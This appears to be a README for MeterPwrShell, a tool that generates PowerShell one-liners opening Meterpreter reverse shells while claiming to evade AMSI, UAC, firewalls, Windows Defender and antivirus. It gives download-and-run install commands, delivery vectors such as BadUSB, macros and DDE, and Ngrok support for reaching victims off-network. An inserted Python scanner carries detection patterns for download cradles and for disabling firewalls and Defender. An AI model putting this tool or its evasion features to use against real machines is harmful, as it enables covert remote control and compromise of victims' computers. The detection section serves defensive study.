MeterPwrShell – Automated Tool That Generates The Perfect PowerShell Payload

Automated tool that generates a PowerShell one-liner that can create a Meterpreter shell on Metasploit, bypass AMSI, bypass the firewall, bypass UAC, and bypass any AVs.

This tool is powered by Metasploit-Framework and amsi.fail

Notes

  • NEVER UPLOAD THE PAYLOAD GENERATED BY THIS PROGRAM TO ANY ONLINE SCANNER
  • NEVER USE THIS PROGRAM FOR MALICIOUS PURPOSES
  • SPREADING THE PAYLOAD GENERATED BY THIS PROGRAM IS NOT COOL
  • ANY DAMAGE CAUSED BY THIS PROGRAM IS NOT MY (as the program maker) RESPONSIBILITY!!!
  • If you have a feature recommendation, post it as an Issue
  • If you have an issue with the program, try redownloading it (trust me), because sometimes I edit the release and fix it without telling anyone
  • If you want to know how tf my payload bypasses any AVs, you can check on this and this
  • Don't even try to fork this repository, you won't get the releases!

Features (v1.5.1)

  • Bypass UAC
  • Automatic Migrate (using PrependMigrate)
  • Built-in GetSYSTEM (if u use the Bypass UAC option)
  • Disable All Firewall Profile (if u use the Bypass UAC option)
  • Fully Bypass Windows Defender Real-time Protection (if you choose shortened payload or using Bypass UAC or both)
  • Disable Windows Defender Security Features (if u use the Bypass UAC option)
  • Fully unkillable payload
  • Bypasses AMSI Successfully (if you choose shortened payload)
  • Short One-Liner (if you choose shortened payload)
  • Bypass Firewall (If you pick an unstaged payload)
  • Great CLI
  • A Lot More (Try it by yourself)

All payload features are tested on Windows 10 v20H2
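
For defenders: several of the behaviours in the feature list (the IEX WebClient one-liner, disabling firewall profiles, disabling Defender settings) show up in PowerShell script block logging (event ID 4104). The scanner below is an added example, not code from MeterPwrShell or its author; the patterns are generic indicators assumed here rather than taken from the tool's real output, and the log lines are constructed.

```python
import re

# Generic indicators (assumptions; NOT extracted from MeterPwrShell payloads).
RULES = {
    # Invoke-Expression fed by a Net.WebClient download, in either order.
    "download_cradle": re.compile(
        r"(?:\biex\b|invoke-expression).*net\.webclient.*download(?:string|data)"
        r"|net\.webclient.*download(?:string|data).*\|\s*(?:iex\b|invoke-expression)",
        re.I),
    "firewall_profile_disabled": re.compile(
        r"set-netfirewallprofile\b.*-enabled\s+(?:\$?false|0)"
        r"|netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    "defender_setting_disabled": re.compile(
        r"set-mppreference\b.*-disable\w+\s+(?:\$?true|1)", re.I),
}

def normalize(text):
    """Strip backtick escapes and collapse whitespace before matching."""
    return re.sub(r"\s+", " ", text.replace("`", ""))

def scan(events):
    """events: iterable of (record_id, script_block_text) from event ID 4104.
    Returns {record_id: [names of matching rules]} for flagged events only."""
    hits = {}
    for record_id, text in events:
        flat = normalize(text)
        matched = sorted(name for name, rx in RULES.items() if rx.search(flat))
        if matched:
            hits[record_id] = matched
    return hits

# Constructed sample events (record id, ScriptBlockText); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    (101, "Get-ChildItem C:\\Users | Select-Object Name"),
    (102, "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    (103, "(New-Object Net.Web`Client).DownloadString('http://example.invalid/b') |\n  iNvOkE-ExPrEsSiOn"),
    (104, "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"),
    (105, "Set-MpPreference -DisableRealtimeMonitoring $true"),
    (106, "Set-MpPreference -DisableRealtimeMonitoring $false"),  # re-enabling: not flagged
]

if __name__ == "__main__":
    for record_id, names in scan(SAMPLE_EVENTS).items():
        print(record_id, ", ".join(names))
```

Script block logging has to be enabled on the endpoint for event ID 4104 to be recorded, and the three patterns are starting points to tune against your own baseline.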

Advantages Of MeterPwrShell Compared To The web_delivery Module From Metasploit Framework

  • Shorter stager (or short one-liner in this case)
  • Various AMSI bypass techniques and code
  • Don't need to set up a server for the stager
  • Built-in Ngrok support (so the victim doesn't need to be on the same local network)
  • Automatic built-in privesc
  • Easily bypasses Windows Defender

Thanks to

  • Every single one of my Discord friends
  • Special Thx to theia#8536 on Discord
  • @FuzzySec for that awesome Masquerade PEB script
  • @decoder-it for that amazing PPID Spoofing script
  • Me for not dying when creating this tool
  • Ed Wilson AKA Microsoft Scripting Guy for the great Powershell scripting tutorials
  • and the last one is Emeric Nasi for the research on bypassing AV dynamics

Requirements

  • Kali Linux, Ubuntu, or Debian (if you don't use one of those, the tool will not work!!!)
  • Metasploit Framework
  • Internet Connection (Both On Victim And Attacker Computer)

Installation

apt update && apt install wget
mkdir MeterPwrShell
cd MeterPwrShell && wget https://github.com/GetRektBoy724/MeterPwrShell/releases/download/v1.5.1/meterpwrshellexec
chmod +x meterpwrshellexec

Usage

# ./meterpwrshellexec -c help
Available arguments : help, version, showbanner, showlastdebuglog, disablerootdetector, disableinternetdetector, disablealldetector
help : Show this page
version : Show MeterPwrShell's version
showbanner : Show MeterPwrShell's Banner
showlastdebuglog : Well,Its kinda self-explanatory tho
disablerootdetector : Well,Its kinda self-explanatory tho
disableinternetdetector : Well,Its kinda self-explanatory tho
disablealldetector : Disable all detector except Linux distribution detector

You can also use MeterPwrShell without any flags and arguments

Attack Vectors

  • BadUSBs
  • Malicious Shortcuts (lnk2pwn)
  • Document Macro Payload
  • MS DDE Exploit
  • Extreme way: type it in by yourself
  • Any exploit/vuln that lets you execute commands on the victim
  • Idk, I have run out of ideas lmao

To-do List

Available features options

  • Bypass AMSI
  • Shortened Payload AKA IEX WebClient method (If you use Bypass AMSI Feature)
  • Bypass UAC (If you use Shortened Payload AKA IEX WebClient method)